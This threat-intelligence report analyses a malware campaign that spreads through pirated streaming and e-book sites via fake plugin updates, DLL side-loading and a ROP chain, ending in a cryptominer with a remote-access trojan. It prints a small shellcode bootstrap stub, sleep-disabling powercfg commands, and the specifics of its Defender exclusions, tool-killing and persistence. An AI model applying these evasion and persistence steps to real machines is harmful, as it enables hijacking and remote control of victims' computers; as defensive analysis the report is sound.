In late April 2026, incident response telemetry identified a sophisticated, multi-stage malware campaign propagating through illegal movie, television streaming platforms, and compromised digital book libraries. The primary delivery vector relies heavily on social engineering via web-based prompts. When a user attempts to stream video content or access digital literature, the compromised platform dynamically generates a counterfeit modal overlay. This alert mimics a critical system notification, informing the victim that their video player plugin or browser version is outdated and requires an immediate update to continue rendering content.

[Compromised Streaming/Book Site]
       │
       ▼ (Fake Plugin Update Notice)
[Downloaded ZIP Archive]
       │
       ▼ (Execution of Legitimate Binary)
[DLL Side-Loading (HLS Installer.874.exe + Malicious DLL)]
       │
       ▼ (Stack Overflow & ROP Chain)
[Decrypted Main Module (SilentCryptoMiner Fork)]

Clicking the call-to-action link triggers the download of a compressed ZIP archive. The structural composition of this archive contains a dual-payload mechanism: a completely legitimate, digitally signed executable (e.g., HLS Installer.874.exe) paired with a weaponized dynamic-link library (DLL). By inducing the user to execute the legitimate binary, the threat actors successfully initiate a classic DLL side-loading vulnerability. The host application implicitly trusts and loads the accompanying malicious library into its memory space, effectively evading baseline signature-based security detections and launching the adversary’s initial execution routine.

Infrastructure Evolution and Historical Campaign Alignment

Forensic evaluation of the infection chain and binary logic indicates that this campaign is not an isolated event, but rather the evolutionary continuation of a threat group active since at least 2022. Historically, the infrastructure relied on interplanetary file system (IPFS) gateways, distributing payload components from staging domains such as file[.]ipfs[.]us[.]69[.]mu. As those nodes were neutralized or blacklisted, the threat actors adapted their command-and-control (C2) and hosting topologies, migrating to newer domains including urush1bar4[.]online.

Parallel campaigns managed by the same threat collective utilize alternative front-end social engineering kits. For example, related infrastructure has been documented deploying a simulated browser crash page—falsely branding itself as a critical Chromium patch (chromium-patch-nightly)—to trigger identical archive downloads. The persistent survival of this operation across several years highlights a highly structured development cycle, wherein the operators continuously refine their crypters, modify staging domains, and update their primary payloads to minimize security telemetry footprints.

Distribution Metrics and Statistical Attack Surface

The potential reach of this operation is exceptionally broad due to the threat group’s choice of high-traffic distribution channels. Telemetry data from early 2026 confirms that the malware is actively embedded across mainstream pirated media ecosystems. The audience distribution spans from smaller digital book repositories pulling approximately 11,000 monthly unique visitors to massive streaming domains hosting between 2.1 million and 27.4 million monthly visitors. Aggregate exposure across all identified infection vectors reached approximately 40 million visits within a single monthly tracking window. By diversifying their placement across both literary and video streaming infrastructure, the threat actors maximize their demographic reach while complicating attribution efforts. The immense volume of incoming traffic ensures a steady influx of newly compromised hosts, which offsets the natural attrition rate of malware remediation by defensive teams.

Advanced Evasion: Junk Code and Stack Smashing ROP Chains

The downloadable weaponized DLL is meticulously designed to frustrate automated sandbox analysis and manual reverse engineering. The binary is artificially inflated with vast blocks of randomly generated, non-functional instructions known as junk code. This inflation serves two structural purposes: it pushes the file size beyond the maximum limits set by many automated secure web gateways and anti-malware scanning engines, and it obfuscates the true control flow graph of the execution routine. Hidden deep within this structural noise lies a highly specific execution trigger designed to cause a deliberate stack buffer overflow via an internal function dubbed SmashStack. The application allocates a rigid 64-byte buffer (stackBuf) on the stack, which is then deliberately overwhelmed with unvalidated input data. Rather than causing a standard application crash, this overflow carefully overwrites the return pointer to execute a Return-Oriented Programming (ROP) chain. The ROP chain orchestrates the decryption of the next payload layer, transferring execution to shellcode concealed within the modified DOS header of the Portable Executable (PE) file.

pop r10
push r10
call $+5
pop rcx
sub rcx, 9
mov rax, rcx
add rax, 5C1000h
call rax
retn

This compact bootstrap code calculates the base memory address dynamically, shifts control to a specialized decryption function located at offset 0x5C1000, and reflexively loads the primary main module entirely within memory, leaving no unencrypted footprint on the physical disk storage.

Main Module Architecture and Defensive Neutralization

The core engine of the payload consists of a heavily customized, highly evasive fork of the open-source SilentCryptoMiner project. Upon initial execution, the module performs an environment verification sequence to ensure it is running on a valid target rather than an analysis sandbox. It collects the host processor architecture, the unique hardware serial number of the primary system drive (C:), user privilege levels, and the system timestamp. This data is exfiltrated using highly covert low-level DNS tunneling. The malware constructs raw, low-level network packets to transmit this telemetry embedded within standard looking DNS queries. To further mask the traffic from network security monitoring tools, the queries are directed toward domain strings appended with microsoft.com, though the destination IP addresses terminate at infrastructure completely external to Microsoft. The malware remains dormant until it receives a precise byte sequence response (01 02 03 04) from its command infrastructure.

Once authorized, if running with elevated administrative privileges, the main module systematically neutralizes host defenses through a series of automated system changes:

• Antivirus Exclusion Injection: Configures Windows Defender to ignore all .exe and .dll extensions across critical system roots, including %USERPROFILE%, %PROGRAMDATA%, and %WINDIR%.
• Process Termination: Disables and kills Microsoft’s Malicious Software Removal Tool (mrt.exe) utilizing native system calls (ZwSetInformationFile with a FileDispositionInformation flag).
• Update Prevention: Alters system policies under HKLM\Software\Policies\Microsoft\MRT by writing a DontOfferThroughWUAU DWORD value set to 1, permanently preventing Windows Update from pushing a replacement copy of the removal tool.
• Power State Optimization: Suppresses system sleep and hibernation states across both alternating current (AC) and direct current (DC) battery profiles via powercfg instructions to maximize continuous compute availability for mining operations.

powercfg /x -hibernate-timeout-ac 0
powercfg /x -hibernate-timeout-dc 0
powercfg /x -standby-timeout-ac 0
powercfg /x -standby-timeout-dc 0

Following defensive neutralization, the malware establishes permanent system persistence. It stages a duplicate copy of itself within C:\ProgramData\Google\Chrome and registers a fake system service named GoogleUpdateTaskMachineQC configured for automatic system startup.

Multi-Stage Privileged vs. Non-Privileged Execution Flows

The malware’s installation and persistence strategies change dynamically depending on the execution privileges inherited at launch. This fork utilizes an aggressive UAC exploitation mechanism to guarantee elevated status.

Privilege Level	Persistence Mechanism	Defensive Action	Injection Strategy
Elevated (Admin)	GoogleUpdateTaskMachineQC Service	Disables Windows Defender, Kills MSRT, Disables Hibernation	Four Reflexive Loads into conhost.exe and explorer.exe
Standard (User)	Registry Run Key in HKCU\...\Windows\CurrentVersion\Run	Repeatedly triggers UAC popups every 3 minutes	Loops persistence validation checks until Service installation succeeds

If dropped into a low-privilege container, the malware clones its binary to %USERPROFILE%\AppData\Roaming\Sandboxie and appends a startup directive to the current user’s registry Run path. It then enters an infinite loop, popping up User Account Control (UAC) authorization windows every three minutes. This loop persists indefinitely until the user gives in to warning fatigue and clicks “Yes,” granting the installer the administrative rights it requires to configure the permanent service.

Sub-Component Injections: Watchdog, RAT, and Crypto-Miners

Once administrative status is confirmed, the main module drops zero files to disk for its sub-components. Instead, it executes four independent reflexive memory injections directly into standard Windows processes. The Remote Access Trojan (RAT) payload is injected straight into the console host process (conhost.exe), allowing operators complete command-line control, file system exfiltration, and remote configuration over the asset. Concurrently, a specialized Watchdog module is injected into the Windows shell (explorer.exe). The sole objective of this watchdog thread is to continuously scan running processes for task managers, process hackers, or system diagnostics tools; if an analysis tool is detected, it instantly kills the miner processes to hide its footprint from the user. The computational payload is divided between a CPU mining module and an advanced GPU mining module, both reflexively running inside separate explorer.exe process contexts. The main installer queries the system’s display adapters using hardware enumeration APIs. If a discrete, high-performance graphics card is present, the GPU miner is launched to hijack the system’s graphics compute cycles. If only integrated graphics are available, the GPU module stays dormant to avoid generating system lag that could alert the user to the infection.

Our Technical Opinion on This Case

This campaign illustrates a highly effective convergence of social engineering, evasive binary design, and living-off-the-land techniques that highlights a growing maturity in commodity cybercrime operations. The use of pirated media platforms as an initial access vector remains a highly profitable strategy for threat actors. Users seeking unauthorized content are already conditioned to bypass standard browser warnings, disable security controls, and download files from questionable origins, which neutralizes traditional perimeter security frameworks. From an architectural standpoint, the malware’s evasion techniques are highly sophisticated for a crypto-mining operation. Overwriting stack structures to execute a custom ROP chain within the DOS header shows a deep familiarity with anti-analysis bypass methods usually seen in targeted corporate espionage or advanced persistent threat (APT) activity. Additionally, bypassing standard disk-writing functions via memory-only reflexive loading ensures that standard file-integrity monitoring tools remain completely blind to the installation of the RAT and miner threads.

The aggressive defense evasion—specifically the forced deletion of Microsoft’s Malicious Software Removal Tool and the manipulation of Windows Update parameters—demonstrates an intent to maintain long-term persistence on the victim’s host. By pairing a hidden background miner with a fully functional Remote Access Trojan, the threat group establishes a dual-revenue infrastructure: they extract immediate financial value via hijacked hardware resources while retaining the access needed to pivot into identity theft, credential harvesting, or selling network access to ransomware brokers. Defensive strategies must shift away from basic file-hash checking and focus heavily on monitoring unauthorized memory injections, unexpected DNS tunneling patterns, and rogue registry service modifications.